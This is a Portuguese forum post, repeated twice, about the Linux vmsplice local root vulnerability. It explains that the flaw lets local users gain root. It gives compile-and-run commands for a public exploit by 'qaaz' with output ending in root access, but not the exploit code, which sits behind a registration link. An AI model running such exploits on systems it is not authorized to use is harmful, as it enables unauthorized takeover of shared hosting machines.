A vulnerabilidade afeta praticamente todas as distribuições que possuem versão do kernel de 2.6.17 a 2.6.24.1.
firebits
Esta vulnerabilidade dá permissão para que usuários locais tenham acesso de root. Este exploit afeta em geral os serviços de hosting onde os usuários tem acesso, aos seus sistemas operacionais via SSH. Caso você utilize computadores em sua casa, sem acesso SSH, o bug pode existir, mas não vai afetar, pois usuários remotos não conseguem acesso de root sem ter uma conta de usuário sem privilégios no computador.
O link do exploit está em: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para testar se o seu sistema está vulnerável, copie o conteúdo do exploit para a máquina de teste (por ser uma maquina virtual em VirtualBox ou Vmware e outros) e execute a compilação pelo GCC com os comandos abaixo:
$ gcc exploit.c -o exploit
$ whoami
(irá mostrar seu login)
$ ./exploit -----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Obs.: você estará logado como root sem permissões e autorização para isso.
firebits
Esta vulnerabilidade dá permissão para que usuários locais tenham acesso de root. Este exploit afeta em geral os serviços de hosting onde os usuários tem acesso, aos seus sistemas operacionais via SSH. Caso você utilize computadores em sua casa, sem acesso SSH, o bug pode existir, mas não vai afetar, pois usuários remotos não conseguem acesso de root sem ter uma conta de usuário sem privilégios no computador.
O link do exploit está em: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para testar se o seu sistema está vulnerável, copie o conteúdo do exploit para a máquina de teste (por ser uma maquina virtual em VirtualBox ou Vmware e outros) e execute a compilação pelo GCC com os comandos abaixo:
$ gcc exploit.c -o exploit
$ whoami
(irá mostrar seu login)
$ ./exploit -----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Obs.: você estará logado como root sem permissões e autorização para isso.
Comment